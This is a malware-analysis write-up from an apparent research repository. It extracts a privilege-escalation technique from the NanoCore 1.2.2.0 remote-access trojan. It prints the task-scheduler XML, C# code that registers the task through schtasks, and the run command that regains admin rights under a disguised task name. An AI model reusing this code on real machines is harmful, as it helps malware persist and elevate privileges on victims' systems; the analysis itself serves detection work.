MalwareAnalysisSeries
This repository contains the analysis reports, technical details or any tools created for helping in malware analysis. Additionally, the repo contains extracted TTPs with code along with the detection rules
Project maintained by shaddy43 Hosted on GitHub Pages — Theme by mattgraham
NanoCore 1.2.2.0: Privilege Escalation
This is a privilege escalation TTP extracted from NanoCore 1.2.2.0. It uses task scheduler to escalate privileges. Initially the NanoCore client is executed with admin privileges, and it creates a task in scheduler with admin configuration. Once the task has been added, the NanoCore client can easily regain admin privileges even after reboot by simply executing a Run task command.
- Execute with admin privileges first
- Can elevate privileges anytime by running the command: schtasks.exe /run /tn “NTFS Manager”
- “NTFS Manager” is the name of malicious task masquerading legitimate windows operations (in nanocore these names are randomized)
- “GetUACControlData” returns the task configuration in bytes
Implementation
Setup task settings file
NanoCore 1.2.2.0 privilege escalation TTP function has encoded xml file bytes that sets up everything for the task. The malware decode configuation, replaces path of executable with Identifier: EXECUTABLEPATH and arguments if any in the xml configuration file and use it to register the task.
<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n
<Task version=\"1.2\"
xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n
<RegistrationInfo />\r\n
<Triggers />\r\n
<Principals>\r\n
<Principal id=\"Author\">\r\n
<LogonType>InteractiveToken</LogonType>\r\n
<RunLevel>HighestAvailable</RunLevel>\r\n
</Principal>\r\n
</Principals>\r\n
<Settings>\r\n
<MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n
<AllowHardTerminate>true</AllowHardTerminate>\r\n
<StartWhenAvailable>false</StartWhenAvailable>\r\n
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n
<IdleSettings>\r\n
<StopOnIdleEnd>false</StopOnIdleEnd>\r\n
<RestartOnIdle>false</RestartOnIdle>\r\n
</IdleSettings>\r\n
<AllowStartOnDemand>true</AllowStartOnDemand>\r\n
<Enabled>true</Enabled>\r\n
<Hidden>false</Hidden>\r\n
<RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n
<WakeToRun>false</WakeToRun>\r\n
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n
<Priority>4</Priority>\r\n
</Settings>\r\n
<Actions Context=\"Author\">\r\n
<Exec>\r\n
<Command>\"#EXECUTABLEPATH\"</Command>\r\n
<Arguments>$(Arg0)</Arguments>\r\n
</Exec>\r\n
</Actions>\r\n
</Task>
According to the task configuration, there are no triggers set to execute task automatically. As mentioned above, NanoCore doesn’t use it for achieveing persistence, rather it uses it to elevate privileges. To do that, only a simple command is needed which is to run the task that was registered.
Register Task
try
{
//creating a temporary task config xml file
string tempFileName = Path.GetTempFileName();
File.WriteAllText(tempFileName, text);
//scheduling task
string task_cmd = string.Format("/create /f /tn \"{0}\" /xml \"{1}\"", task, tempFileName);
ProcessStartInfo startInfo = SetProcessInfo("schtasks.exe", task_cmd);
Process process = Process.Start(startInfo);
bool result = false;
if (process.WaitForExit(duration))
{
result = (process.ExitCode == 0);
}
File.Delete(tempFileName); //delete temporary task configuration file
return result;
}
catch (Exception exception_)
{
Console.WriteLine(exception_ + ":CreateScheduledTask");
}
Elevate
After the task has sucessfully been registered. We can run it like this:
schtasks.exe /run /tn "NTFS Manager" //eg: NTFS Manager is the name of registered task
Find Complete Code Click Here: Shaddy43/MalwareAnalaysisSeries
Disclaimer
Artifacts and code of this repository is intended for Educational purposes only!